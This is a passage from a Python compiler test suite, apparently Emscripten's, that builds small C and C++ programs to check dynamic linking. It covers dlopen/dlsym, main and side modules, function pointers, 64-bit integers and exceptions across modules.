self.do_runf('src.c', 'success.\n')
@needs_dylink
def test_dlfcn_self(self):
self.set_setting('MAIN_MODULE')
self.set_setting('EXPORT_ALL')
def get_data_exports(wasm):
wat = self.get_wasm_text(wasm)
lines = wat.splitlines()
exports = [l for l in lines if l.strip().startswith('(export ')]
data_exports = [l for l in exports if '(global ' in l]
data_exports = [d.split()[1].strip('"') for d in data_exports]
return data_exports
self.do_core_test('test_dlfcn_self.c')
data_exports = get_data_exports('test_dlfcn_self.wasm')
data_exports = '\n'.join(sorted(data_exports)) + '\n'
self.assertFileContents(test_file('core/test_dlfcn_self.exports'), data_exports)
@needs_dylink
def test_dlfcn_unique_sig(self):
create_file('liblib.c', r'''
#include <stdio.h>
int myfunc(int a, int b, int c, int d, int e, int f, int g, int h, int i, int j, int k, int l, int m) {
return 13;
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <dlfcn.h>
typedef int (*FUNCTYPE)(int, int, int, int, int, int, int, int, int, int, int, int, int);
int main() {
void *lib_handle;
FUNCTYPE func_ptr;
lib_handle = dlopen("liblib.so", RTLD_NOW);
assert(lib_handle != NULL);
func_ptr = (FUNCTYPE)dlsym(lib_handle, "myfunc");
assert(func_ptr != NULL);
assert(func_ptr(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) == 13);
puts("success");
return 0;
}
''')
self.do_runf('main.c', 'success')
@needs_dylink
def test_dlfcn_info(self):
create_file('liblib.c', r'''
#include <stdio.h>
int myfunc(int a, int b, int c, int d, int e, int f, int g, int h, int i, int j, int k, int l, int m) {
return 13;
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
create_file('main.c', '''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <dlfcn.h>
typedef int (*FUNCTYPE)(int, int, int, int, int, int, int, int, int, int, int, int, int);
int main() {
void *lib_handle;
FUNCTYPE func_ptr;
lib_handle = dlopen("liblib.so", RTLD_NOW);
assert(lib_handle != NULL);
func_ptr = (FUNCTYPE)dlsym(lib_handle, "myfunc");
assert(func_ptr != NULL);
assert(func_ptr(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) == 13);
/* Verify that we don't corrupt func_ptr when calling dladdr. */
Dl_info info;
memset(&info, 0, sizeof(info));
dladdr(func_ptr, &info);
assert(func_ptr != NULL);
assert(func_ptr(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) == 13);
/* Verify something useful lives in info. */
assert(info.dli_fname != NULL);
assert(info.dli_fbase == NULL);
assert(info.dli_sname == NULL);
assert(info.dli_saddr == NULL);
puts("success");
return 0;
}
''')
self.do_runf('main.c', 'success')
@needs_dylink
def test_dlfcn_stacks(self):
create_file('liblib.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
int myfunc(const char *input) {
char bigstack[1024] = { 0 };
// make sure we didn't just trample the stack!
assert(!strcmp(input, "foobar"));
snprintf(bigstack, sizeof(bigstack), "%s", input);
return strlen(bigstack);
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
create_file('main.c', '''
#include <assert.h>
#include <stdio.h>
#include <dlfcn.h>
#include <string.h>
typedef int (*FUNCTYPE)(const char *);
int main() {
void *lib_handle;
FUNCTYPE func_ptr;
char str[128];
snprintf(str, sizeof(str), "foobar");
// HACK: Use strcmp in the main executable so that it doesn't get optimized out and the dynamic library
// is able to use it.
assert(!strcmp(str, "foobar"));
lib_handle = dlopen("liblib.so", RTLD_NOW);
assert(lib_handle != NULL);
func_ptr = (FUNCTYPE)dlsym(lib_handle, "myfunc");
assert(func_ptr != NULL);
assert(func_ptr(str) == 6);
puts("success");
return 0;
}
''')
self.do_runf('main.c', 'success')
@needs_dylink
def test_dlfcn_funcs(self):
create_file('liblib.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
typedef void (*voidfunc)();
typedef void (*intfunc)(int);
void callvoid(voidfunc f) { f(); }
void callint(voidfunc f, int x) { f(x); }
void void_0() { printf("void 0\n"); }
void void_1() { printf("void 1\n"); }
voidfunc getvoid(int i) {
switch(i) {
case 0: return void_0;
case 1: return void_1;
default: return NULL;
}
}
void int_0(int x) { printf("int 0 %d\n", x); }
void int_1(int x) { printf("int 1 %d\n", x); }
intfunc getint(int i) {
switch(i) {
case 0: return int_0;
case 1: return int_1;
default: return NULL;
}
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <dlfcn.h>
typedef void (*voidfunc)();
typedef void (*intfunc)(int);
typedef void (*voidcaller)(voidfunc);
typedef void (*intcaller)(intfunc, int);
typedef voidfunc (*voidgetter)(int);
typedef intfunc (*intgetter)(int);
void void_main() { printf("void_main.\n"); }
void int_main(int x) { printf("int_main %d\n", x); }
int main() {
printf("go\n");
void *lib_handle;
lib_handle = dlopen("liblib.so", RTLD_NOW);
assert(lib_handle != NULL);
voidcaller callvoid = (voidcaller)dlsym(lib_handle, "callvoid");
assert(callvoid != NULL);
callvoid(void_main);
intcaller callint = (intcaller)dlsym(lib_handle, "callint");
assert(callint != NULL);
callint(int_main, 201);
voidgetter getvoid = (voidgetter)dlsym(lib_handle, "getvoid");
assert(getvoid != NULL);
callvoid(getvoid(0));
callvoid(getvoid(1));
intgetter getint = (intgetter)dlsym(lib_handle, "getint");
assert(getint != NULL);
callint(getint(0), 54);
callint(getint(1), 9000);
assert(getint(1000) == NULL);
puts("ok");
return 0;
}
''')
self.do_runf('main.c', '''go
void_main.
int_main 201
void 0
void 1
int 0 54
int 1 9000
ok
''')
@needs_dylink
def test_dlfcn_mallocs(self):
# will be exhausted without functional malloc/free
self.set_setting('INITIAL_MEMORY', '64mb')
create_file('liblib.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void *mallocproxy(int n) { return malloc(n); }
void freeproxy(void *p) { free(p); }
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
self.do_runf(test_file('dlmalloc_proxy.c'), '*294,153*')
@needs_dylink
def test_dlfcn_longjmp(self):
create_file('liblib.c', r'''
#include <setjmp.h>
#include <stdio.h>
void jumpy(jmp_buf buf) {
static int i = 0;
i++;
if (i == 10) longjmp(buf, i);
printf("pre %d\n", i);
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <dlfcn.h>
#include <setjmp.h>
typedef void (*jumpfunc)(jmp_buf);
int main() {
printf("go!\n");
void *lib_handle;
lib_handle = dlopen("liblib.so", RTLD_NOW);
assert(lib_handle != NULL);
jumpfunc jumpy = (jumpfunc)dlsym(lib_handle, "jumpy");
assert(jumpy);
jmp_buf buf;
int jmpval = setjmp(buf);
if (jmpval == 0) {
while (1) jumpy(buf);
} else {
printf("out!\n");
}
return 0;
}
''')
self.do_runf('main.c', '''go!
pre 1
pre 2
pre 3
pre 4
pre 5
pre 6
pre 7
pre 8
pre 9
out!
''', force_c=True)
# TODO: make this work. need to forward tempRet0 across modules
# TODO Enable @with_both_eh_sjlj (the test is not working now)
@needs_dylink
def zzztest_dlfcn_exceptions(self):
self.set_setting('DISABLE_EXCEPTION_CATCHING', 0)
create_file('liblib.cpp', r'''
extern "C" {
int ok() {
return 65;
}
int fail() {
throw 123;
}
}
''')
self.build_dlfcn_lib('liblib.cpp')
self.prep_dlfcn_main()
src = r'''
#include <assert.h>
#include <stdio.h>
#include <dlfcn.h>
typedef int (*intfunc)();
int main() {
printf("go!\n");
void *lib_handle;
lib_handle = dlopen("liblib.so", RTLD_NOW);
assert(lib_handle != NULL);
intfunc okk = (intfunc)dlsym(lib_handle, "ok");
intfunc faill = (intfunc)dlsym(lib_handle, "fail");
assert(okk && faill);
try {
printf("ok: %d\n", okk());
} catch(...) {
printf("wha\n");
}
try {
printf("fail: %d\n", faill());
} catch(int x) {
printf("int %d\n", x);
}
try {
printf("fail: %d\n", faill());
} catch(double x) {
printf("caught %f\n", x);
}
return 0;
}
'''
self.do_run(src, '''go!
ok: 65
int 123
ok
''')
@needs_dylink
def test_dlfcn_handle_alloc(self):
# verify that dlopen does not allocate already used handles
dirname = self.get_dir()
def indir(name):
return os.path.join(dirname, name)
create_file('a.cpp', r'''
#include <stdio.h>
static class A {
public:
A() {
puts("a: loaded");
}
} _;
''')
create_file('b.cpp', r'''
#include <stdio.h>
static class B {
public:
B() {
puts("b: loaded");
}
} _;
''')
self.build_dlfcn_lib('a.cpp')
shutil.move(indir('liblib.so'), indir('liba.so'))
self.build_dlfcn_lib('b.cpp')
shutil.move(indir('liblib.so'), indir('libb.so'))
self.set_setting('MAIN_MODULE')
self.set_setting('NODERAWFS')
self.clear_setting('SIDE_MODULE')
create_file('main.c', r'''
#include <dlfcn.h>
#include <assert.h>
#include <stddef.h>
int main() {
void *liba, *libb, *liba2, *libb2;
int err;
liba = dlopen("liba.so", RTLD_NOW);
assert(liba != NULL);
libb = dlopen("libb.so", RTLD_NOW);
assert(libb != NULL);
// Test that opening libb a second times gives the same handle
libb2 = dlopen("libb.so", RTLD_NOW);
assert(libb == libb2);
err = dlclose(liba);
assert(!err);
liba2 = dlopen("liba.so", RTLD_NOW);
assert(liba2 != libb);
return 0;
}
''')
self.do_runf('main.c', 'a: loaded\nb: loaded\n')
@needs_dylink
@needs_non_trapping_float_to_int
def test_dlfcn_feature_in_lib(self):
self.emcc_args.append('-mnontrapping-fptoint')
create_file('liblib.c', r'''
int magic(float x) {
return __builtin_wasm_trunc_saturate_s_i32_f32(x);
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
src = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
typedef int (*fi)(float);
int main() {
void *lib_handle = dlopen("liblib.so", RTLD_NOW);
if (!lib_handle) {
puts(dlerror());
abort();
}
fi x = (fi)dlsym(lib_handle, "magic");
if (!x) {
puts(dlerror());
abort();
}
printf("float: %d.\n", x(42.99));
return 0;
}
'''
self.do_run(src, 'float: 42.\n')
def dylink_test(self, main, side, expected=None, header=None, force_c=False,
main_module=2, **kwargs):
# Same as dylink_testf but take source code in string form
if not isinstance(side, list):
side_file = 'liblib.cpp' if not force_c else 'liblib.c'
create_file(side_file, side)
side = side_file
if not isinstance(main, list):
main_file = 'main.cpp' if not force_c else 'main.c'
create_file(main_file, main)
main = main_file
if header:
create_file('header.h', header)
return self.dylink_testf(main, side, expected, force_c, main_module=main_module, **kwargs)
def dylink_testf(self, main, side=None, expected=None, force_c=False, main_emcc_args=[],
main_module=2,
so_name='liblib.so',
need_reverse=True, **kwargs):
self.maybe_closure()
# Same as dylink_test but takes source code as filenames on disc.
old_args = self.emcc_args.copy()
if not expected:
outfile = shared.replace_suffix(main, '.out')
expected = read_file(outfile)
if not side:
side, ext = os.path.splitext(main)
side += '_side' + ext
# side settings
self.clear_setting('MAIN_MODULE')
self.set_setting('SIDE_MODULE')
side_suffix = 'wasm' if self.is_wasm() else 'js'
if isinstance(side, list):
out_file = 'liblib.' + side_suffix
# side is just a library
self.run_process([EMCC] + side + self.get_emcc_args() + ['-o', out_file])
else:
out_file = self.build(side, js_outfile=(side_suffix == 'js'))
shutil.move(out_file, so_name)
# main settings
self.set_setting('MAIN_MODULE', main_module)
self.clear_setting('SIDE_MODULE')
self.emcc_args += main_emcc_args
self.emcc_args.append(so_name)
if force_c:
self.emcc_args.append('-nostdlib++')
if isinstance(main, list):
# main is just a library
try_delete('main.js')
self.run_process([EMCC] + main + self.get_emcc_args() + ['-o', 'main.js'])
self.do_run('main.js', expected, no_build=True, **kwargs)
else:
self.do_runf(main, expected, force_c=force_c, **kwargs)
self.emcc_args = old_args
if need_reverse:
print('flip')
# Test the reverse as well. There we flip the role of the side module and main module.
# - We add --no-entry since the side module doesn't have a `main`
self.dylink_testf(side, main, expected, force_c, main_emcc_args + ['--no-entry'],
need_reverse=False, **kwargs)
def do_basic_dylink_test(self, **kwargs):
self.dylink_test(r'''
#include <stdio.h>
#include "header.h"
int main() {
printf("other says %d.\n", sidey());
return 0;
}
''', '''
#include "header.h"
int sidey() {
return 11;
}
''', 'other says 11.', 'int sidey();', force_c=True, **kwargs)
@needs_dylink
def test_dylink_basics(self):
self.do_basic_dylink_test(need_reverse=False)
self.verify_in_strict_mode('main.js')
@needs_dylink
def test_dylink_basics_no_modify(self):
if self.is_optimizing():
self.skipTest('no modify mode only works with non-optimizing builds')
self.set_setting('WASM_BIGINT')
self.set_setting('ERROR_ON_WASM_CHANGES_AFTER_LINK')
self.do_basic_dylink_test()
@needs_dylink
def test_dylink_basics_lld_report_undefined(self):
self.set_setting('LLD_REPORT_UNDEFINED')
self.do_basic_dylink_test()
@needs_dylink
def test_dylink_no_export(self):
self.set_setting('NO_DECLARE_ASM_MODULE_EXPORTS')
self.do_basic_dylink_test()
@needs_dylink
def test_dylink_memory_growth(self):
if not self.is_wasm():
self.skipTest('wasm only')
self.set_setting('ALLOW_MEMORY_GROWTH')
self.do_basic_dylink_test()
@needs_dylink
def test_dylink_safe_heap(self):
self.set_setting('SAFE_HEAP')
self.do_basic_dylink_test()
@needs_dylink
def test_dylink_function_pointer_equality(self):
self.dylink_test(r'''
#include <stdio.h>
#include "header.h"
int main() {
void* puts_side = get_address();
printf("main module address %p.\n", &puts);
printf("side module address address %p.\n", puts_side);
if (&puts == puts_side)
printf("success\n");
else
printf("failure\n");
return 0;
}
''', '''
#include <stdio.h>
#include "header.h"
void* get_address() {
return (void*)&puts;
}
''', 'success', header='void* get_address();', force_c=True)
@needs_dylink
def test_dylink_floats(self):
self.dylink_test(r'''
#include <stdio.h>
extern float sidey();
int main() {
printf("other says %.2f.\n", sidey()+1);
return 0;
}
''', '''
float sidey() { return 11.5; }
''', 'other says 12.50', force_c=True)
@needs_dylink
def test_dylink_printf(self):
self.dylink_test(r'''
#include <stdio.h>
void sidey();
int main() {
printf("hello from main\n");
sidey();
return 0;
}
''', r'''
#include <stdio.h>
void sidey() {
printf("hello from side\n");
}
''', 'hello from main\nhello from side\n', force_c=True)
# Verify that a function pointer can be passed back and forth and invoked
# on both sides.
@needs_dylink
def test_dylink_funcpointer(self):
self.dylink_test(
main=r'''
#include <stdio.h>
#include <assert.h>
#include "header.h"
intfunc sidey(intfunc f);
void a(int arg) { printf("hello from funcptr: %d\n", arg); }
int main() {
intfunc b = sidey(a);
assert(a == b);
b(0);
return 0;
}
''',
side='''
#include "header.h"
intfunc sidey(intfunc f) { f(1); return f; }
''',
expected='hello from funcptr: 1\nhello from funcptr: 0\n',
header='typedef void (*intfunc)(int );', force_c=True)
@needs_dylink
# test dynamic linking of a module with multiple function pointers, stored
# statically
def test_dylink_static_funcpointers(self):
self.dylink_test(
main=r'''
#include <stdio.h>
#include "header.h"
void areturn0() { printf("hello 0\n"); }
void areturn1() { printf("hello 1\n"); }
void areturn2() { printf("hello 2\n"); }
voidfunc func_ptrs[3] = { areturn0, areturn1, areturn2 };
int main(int argc, char **argv) {
sidey(func_ptrs[0]);
sidey(func_ptrs[1]);
sidey(func_ptrs[2]);
return 0;
}
''',
side='''
#include "header.h"
void sidey(voidfunc f) { f(); }
''',
expected='hello 0\nhello 1\nhello 2\n',
header='typedef void (*voidfunc)(); void sidey(voidfunc f);', force_c=True)
@needs_dylink
def test_dylink_funcpointers_wrapper(self):
self.dylink_test(
main=r'''\
#include <stdio.h>
#include "header.h"
int main(int argc, char **argv) {
charfunc f1 = emscripten_run_script;
f1("console.log('one')");
charfunc f2 = get();
f2("console.log('two')");
return 0;
}
''',
side='''\
#include "header.h"
charfunc get() {
return emscripten_run_script;
}
''',
expected='one\ntwo\n',
header='''\
#include <emscripten.h>
typedef void (*charfunc)(const char*);
extern charfunc get();
''', force_c=True)
@needs_dylink
def test_dylink_static_funcpointer_float(self):
self.dylink_test(
main=r'''\
#include <stdio.h>
#include "header.h"
int sidey(floatfunc f);
float func1(float f) { printf("hello 1: %f\n", f); return 0; }
floatfunc f1 = &func1;
int main(int argc, char **argv) {
printf("got: %d\n", sidey(f1));
f1(12.34);
return 0;
}
''',
side='''\
#include "header.h"
int sidey(floatfunc f) { f(56.78); return 1; }
''',
expected='hello 1: 56.779999\ngot: 1\nhello 1: 12.340000\n',
header='typedef float (*floatfunc)(float);', force_c=True)
@needs_dylink
def test_missing_signatures(self):
create_file('test_sig.c', r'''#include <emscripten.h>
int main() {
return 0 == ( (long)&emscripten_run_script_string +
(long)&emscripten_run_script );
}''')
self.set_setting('MAIN_MODULE', 1)
# also test main module with 4GB of memory. we need to emit a "maximum"
# clause then, even though 4GB is the maximum; see
# https://github.com/emscripten-core/emscripten/issues/14130
self.set_setting('ALLOW_MEMORY_GROWTH', '1')
self.set_setting('MAXIMUM_MEMORY', '4GB')
self.do_runf('test_sig.c', '')
@needs_dylink
def test_dylink_global_init(self):
self.dylink_test(r'''
#include <stdio.h>
struct Class {
Class() { printf("a new Class\n"); }
};
static Class c;
int main() {
return 0;
}
''', r'''
void nothing() {}
''', 'a new Class\n')
@needs_dylink
def test_dylink_global_inits(self):
def test():
self.dylink_test(header=r'''
#include <stdio.h>
struct Class {
Class(const char *name) { printf("new %s\n", name); }
};
''', main=r'''
#include "header.h"
static Class c("main");
int main() {
return 0;
}
''', side=r'''
#include "header.h"
static Class c("side");
''', expected=['new main\nnew side\n', 'new side\nnew main\n'])
test()
print('check warnings')
self.set_setting('ASSERTIONS', 2)
test()
# TODO: this in wasm
# full = self.run_js('src.js')
# self.assertNotContained('already exists', full)
@needs_dylink
def test_dylink_i64(self):
self.dylink_test(r'''
#include <stdio.h>
#include <stdint.h>
extern int64_t sidey();
int main() {
printf("other says %lld.\n", sidey());
return 0;
}
''', '''
#include <stdint.h>
int64_t sidey() {
return 42;
}
''', 'other says 42.', force_c=True)
@all_engines
@needs_dylink
def test_dylink_i64_b(self):
self.dylink_test(r'''
#include <stdio.h>
#include <stdint.h>
extern int64_t sidey();
int64_t testAdd(int64_t a) {
return a + 1;
}
int64_t testAddB(int a) {
return a + 1;
}
typedef int64_t (*testAddHandler)(int64_t);
testAddHandler h = &testAdd;
typedef int64_t (*testAddBHandler)(int);
testAddBHandler hb = &testAddB;
int main() {
printf("other says %lld.\n", sidey());
int64_t r = h(42);
printf("my fp says: %lld.\n", r);
int64_t rb = hb(42);
printf("my second fp says: %lld.\n", r);
}
''', '''
#include <stdint.h>
int64_t sidey() {
volatile int64_t x = 0x12345678abcdef12LL;
x += x % 17;
x = 18 - x;
return x;
}
''', 'other says -1311768467750121224.\nmy fp says: 43.\nmy second fp says: 43.', force_c=True)
@needs_dylink
@also_with_wasm_bigint
def test_dylink_i64_c(self):
self.dylink_test(r'''
#include <stdio.h>
#include <inttypes.h>
#include "header.h"
typedef int32_t (*fp_type_32)(int32_t, int32_t, int32_t);
typedef int64_t (*fp_type_64)(int32_t, int32_t, int32_t);
int32_t internal_function_ret_32(int32_t i, int32_t j, int32_t k) {
return 32;
}
int64_t internal_function_ret_64(int32_t i, int32_t j, int32_t k) {
return 64;
}
int main() {
fp_type_32 fp32_internal = &internal_function_ret_32;
fp_type_32 fp32_external = &function_ret_32;
fp_type_64 fp64_external = &function_ret_64;
fp_type_64 fp64_internal = &internal_function_ret_64;
int32_t ires32 = fp32_internal(0,0,0);
printf("res32 - internal %d\n",ires32);
int32_t eres32 = fp32_external(0,0,0);
printf("res32 - external %d\n",eres32);
int64_t ires64 = fp64_internal(0,0,0);
printf("res64 - internal %" PRId64 "\n",ires64);
int64_t eres64 = fp64_external(0,0,0);
printf("res64 - external %" PRId64 "\n",eres64);
return 0;
}
''', '''
#include "header.h"
int32_t function_ret_32(int32_t i, int32_t j, int32_t k) {
return 32;
}
int64_t function_ret_64(int32_t i, int32_t j, int32_t k) {
return 64;
}
''', '''res32 - internal 32
res32 - external 32
res64 - internal 64
res64 - external 64\n''', header='''
#include <emscripten.h>
#include <stdint.h>
EMSCRIPTEN_KEEPALIVE int32_t function_ret_32(int32_t i, int32_t j, int32_t k);
EMSCRIPTEN_KEEPALIVE int64_t function_ret_64(int32_t i, int32_t j, int32_t k);
''', force_c=True)
@needs_dylink
@also_with_wasm_bigint
def test_dylink_i64_invoke(self):
self.set_setting('DISABLE_EXCEPTION_CATCHING', 0)
self.dylink_test(r'''\
#include <stdio.h>
#include <stdint.h>
extern "C" int64_t sidey(int64_t arg);
int main(int argc, char *argv[]) {
int64_t temp = 42;
printf("got %lld\n", sidey(temp));
return 0;
}''', r'''\
#include <stdint.h>
#include <stdio.h>
#include <emscripten.h>
extern "C" {
EMSCRIPTEN_KEEPALIVE int64_t do_call(int64_t arg) {
if (arg == 0) {
throw;
}
return 2 * arg;
}
int64_t sidey(int64_t arg) {
try {
return do_call(arg);
} catch(...) {
return 0;
}
}
}''', 'got 84', need_reverse=False)
@needs_dylink
def test_dylink_class(self):
self.dylink_test(header=r'''
#include <stdio.h>
struct Class {
Class(const char *name);
};
''', main=r'''
#include "header.h"
int main() {
Class c("main");
return 0;
}
''', side=r'''
#include "header.h"
Class::Class(const char *name) { printf("new %s\n", name); }
''', expected=['new main\n'])
@needs_dylink
def test_dylink_global_var(self):
self.dylink_test(main=r'''
#include <stdio.h>
extern int x;
int main() {
printf("extern is %d.\n", x);
return 0;
}
''', side=r'''
int x = 123;
''', expected=['extern is 123.\n'], force_c=True)
@needs_dylink
def test_dylink_global_var_modded(self):
self.dylink_test(main=r'''
#include <stdio.h>
extern int x;
int main() {
printf("extern is %d.\n", x);
return 0;
}
''', side=r'''
int x = 123;
struct Initter {
Initter() { x = 456; }
};
Initter initter;
''', expected=['extern is 456.\n'])
@needs_dylink
def test_dylink_stdlib(self):
self.dylink_test(header=r'''
#include <math.h>
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
double pow_two(double x);
''', main=r'''
#include <stdio.h>
#include "header.h"
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
puts(ret);
printf("pow_two: %d.\n", (int)pow_two(5.9));
return 0;
}
''', side=r'''
#include "header.h"
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
double pow_two(double x) {
return pow(2, x);
}
''', expected=['hello through side\n\npow_two: 59.'], force_c=True)
@needs_dylink
def test_dylink_jslib(self):
create_file('lib.js', r'''
mergeInto(LibraryManager.library, {
test_lib_func: function(x) {
return x + 17.2;
}
});
''')
self.dylink_test(header=r'''
extern double test_lib_func(int input);
''', main=r'''
#include <stdio.h>
#include "header.h"
extern double sidey();
int main2() { return 11; }
int main() {
int input = sidey();
double temp = test_lib_func(input);
printf("other says %.2f\n", temp);
printf("more: %.5f, %d\n", temp, input);
return 0;
}
''', side=r'''
#include <stdio.h>
#include "header.h"
extern int main2();
double sidey() {
int temp = main2();
printf("main2 sed: %d\n", temp);
printf("main2 sed: %u, %c\n", temp, temp/2);
return test_lib_func(temp);
}
''', expected='other says 45.2', main_emcc_args=['--js-library', 'lib.js'], force_c=True)
@needs_dylink
def test_dylink_many_postsets(self):
NUM = 1234
self.dylink_test(header=r'''
#include <stdio.h>
typedef void (*voidfunc)();
static void simple() {
printf("simple.\n");
}
static volatile voidfunc funcs[''' + str(NUM) + '] = { ' + ','.join(['simple'] * NUM) + r''' };
static void test() {
volatile int i = ''' + str(NUM - 1) + r''';
funcs[i]();
i = 0;
funcs[i]();
}
extern void more();
''', main=r'''
#include "header.h"
int main() {
test();
more();
return 0;
}
''', side=r'''
#include "header.h"
void more() {
test();
}
''', expected=['simple.\nsimple.\nsimple.\nsimple.\n'], force_c=True)
@needs_dylink
def test_dylink_postsets_chunking(self):
self.dylink_test(header=r'''
extern int global_var;
''', main=r'''
#include <stdio.h>
#include "header.h"
// prepare 99 global variable with local initializer
static int p = 1;
#define P(x) __attribute__((used)) int *padding##x = &p;
P(01) P(02) P(03) P(04) P(05) P(06) P(07) P(08) P(09) P(10)
P(11) P(12) P(13) P(14) P(15) P(16) P(17) P(18) P(19) P(20)
P(21) P(22) P(23) P(24) P(25) P(26) P(27) P(28) P(29) P(30)
P(31) P(32) P(33) P(34) P(35) P(36) P(37) P(38) P(39) P(40)
P(41) P(42) P(43) P(44) P(45) P(46) P(47) P(48) P(49) P(50)
P(51) P(52) P(53) P(54) P(55) P(56) P(57) P(58) P(59) P(60)
P(61) P(62) P(63) P(64) P(65) P(66) P(67) P(68) P(69) P(70)
P(71) P(72) P(73) P(74) P(75) P(76) P(77) P(78) P(79) P(80)
P(81) P(82) P(83) P(84) P(85) P(86) P(87) P(88) P(89) P(90)
P(91) P(92) P(93) P(94) P(95) P(96) P(97) P(98) P(99)
// prepare global variable with global initializer
int *ptr = &global_var;
int main(int argc, char *argv[]) {
printf("%d\n", *ptr);
}
''', side=r'''
#include "header.h"
int global_var = 12345;
''', expected=['12345\n'], force_c=True)
@needs_dylink
@parameterized({
'libcxx': ('libc,libc++,libmalloc,libc++abi',),
'all': ('1',),
'missing': ('libc,libmalloc', False, False, False),
'missing_assertions': ('libc,libmalloc', False, False, True),
})
def test_dylink_syslibs(self, syslibs, expect_pass=True, need_reverse=True, assertions=True):
# one module uses libcxx, need to force its inclusion when it isn't the main
self.emcc_args.append('-Wno-deprecated')
self.set_setting('WARN_ON_UNDEFINED_SYMBOLS', 0)
if assertions is not None:
self.set_setting('ASSERTIONS', int(assertions))
if expect_pass:
expected = 'cout hello from side'
assert_returncode = 0
else:
if assertions:
expected = 'build the MAIN_MODULE with EMCC_FORCE_STDLIBS=1 in the environment'
else:
expected = 'Error'
assert_returncode = NON_ZERO
with env_modify({'EMCC_FORCE_STDLIBS': syslibs, 'EMCC_ONLY_FORCED_STDLIBS': '1'}):
self.dylink_test(main=r'''
void side();
int main() {
side();
return 0;
}
''', side=r'''
#include <iostream>
void side() { std::cout << "cout hello from side\n"; }
''', expected=expected, need_reverse=need_reverse, main_module=1, assert_returncode=assert_returncode)
@needs_dylink
@with_env_modify({'EMCC_FORCE_STDLIBS': 'libc++'})
def test_dylink_iostream(self):
self.dylink_test(header=r'''
#include <iostream>
#include <string>
std::string side();
''', main=r'''
#include "header.h"
int main() {
std::cout << "hello from main " << side() << std::endl;
return 0;
}
''', side=r'''
#include "header.h"
std::string side() { return "and hello from side"; }
''', expected=['hello from main and hello from side\n'])
@needs_dylink
def test_dylink_dynamic_cast(self): # issue 3465
self.dylink_test(header=r'''
class Base {
public:
virtual void printName();
};
class Derived : public Base {
public:
void printName();
};
''', main=r'''
#include "header.h"
#include <iostream>
using namespace std;
int main() {
cout << "starting main" << endl;
Base *base = new Base();
Base *derived = new Derived();
base->printName();
derived->printName();
if (dynamic_cast<Derived*>(derived)) {
cout << "OK" << endl;
} else {
cout << "KO" << endl;
}
return 0;
}
''', side=r'''
#include "header.h"
#include <iostream>
using namespace std;
void Base::printName() {
cout << "Base" << endl;
}
void Derived::printName() {
cout << "Derived" << endl;
}
''', expected=['starting main\nBase\nDerived\nOK'])
@with_both_eh_sjlj
@needs_dylink
def test_dylink_raii_exceptions(self):
self.dylink_test(main=r'''
#include <stdio.h>
extern int side();
int main() {
printf("from side: %d.\n", side());
}
''', side=r'''
#include <stdio.h>
typedef int (*ifdi)(float, double, int);
int func_with_special_sig(float a, double b, int c) {
printf("special %f %f %d\n", a, b, c);
return 1337;
}
struct DestructorCaller {
~DestructorCaller() { printf("destroy\n"); }
};
int side() {
// d has a destructor that must be called on function
// exit, which means an invoke will be used for the
// indirect call here - and the signature of that call
// is special and not present in the main module, so
// it must be generated for the side module.
DestructorCaller d;
volatile ifdi p = func_with_special_sig;
return p(2.18281, 3.14159, 42);
}
''', expected=['special 2.182810 3.141590 42\ndestroy\nfrom side: 1337.\n'])
@with_both_eh_sjlj
@needs_dylink
def test_dylink_exceptions_try_catch(self):
self.dylink_test(main=r'''
#include <stdio.h>
extern void side();
int main() {
try {
throw 3;
} catch (int n) {
printf("main: caught %d\n", n);
}
side();
return 0;
}
''', side=r'''
#include <stdio.h>
void side() {
try {
throw 5.3f;
} catch (float f) {
printf("side: caught %.1f\n", f);
}
}
''', expected=['main: caught 3\nside: caught 5.3\n'])
@with_both_eh_sjlj
@needs_dylink
def test_dylink_exceptions_try_catch_2(self):
self.dylink_test(main=r'''
#include <stdio.h>
extern void side_throw_int();
int main() {
try {
side_throw_int();
} catch (int n) {
printf("main: caught %d\n", n);
}
return 0;
}
void main_throw_float() {
throw 5.3f;
}
''', side=r'''
#include <stdio.h>
extern void main_throw_float();
void side_throw_int() {
try {
main_throw_float();
} catch (float f) {
printf("side: caught %.1f\n", f);
}
throw 3;
}
''', expected=['side: caught 5.3\nmain: caught 3\n'])
@with_both_eh_sjlj
@needs_dylink
def test_dylink_exceptions_try_catch_3(self):
main = r'''
#include <dlfcn.h>
int main() {
void* handle = dlopen("liblib.so", RTLD_LAZY);
void (*side)(void) = (void (*)(void))dlsym(handle, "side");
(side)();
return 0;
}
'''
side = r'''
#include <stdio.h>
extern "C" void side() {
try {
throw 3;
} catch (int x){
printf("side: caught int %d\n", x);
} catch (float x){
printf("side: caught float %f\n", x);
}
}
'''
create_file('liblib.cpp', side)
create_file('main.cpp', main)
self.maybe_closure()
# Same as dylink_test but takes source code as filenames on disc.
# side settings
self.clear_setting('MAIN_MODULE')
self.set_setting('SIDE_MODULE')
out_file = self.build('liblib.cpp', js_outfile=False)
shutil.move(out_file, "liblib.so")
# main settings
self.set_setting('MAIN_MODULE', 1)
self.clear_setting('SIDE_MODULE')
expected = "side: caught int 3\n"
self.do_runf("main.cpp", expected)
@needs_dylink
@disabled('https://github.com/emscripten-core/emscripten/issues/12815')
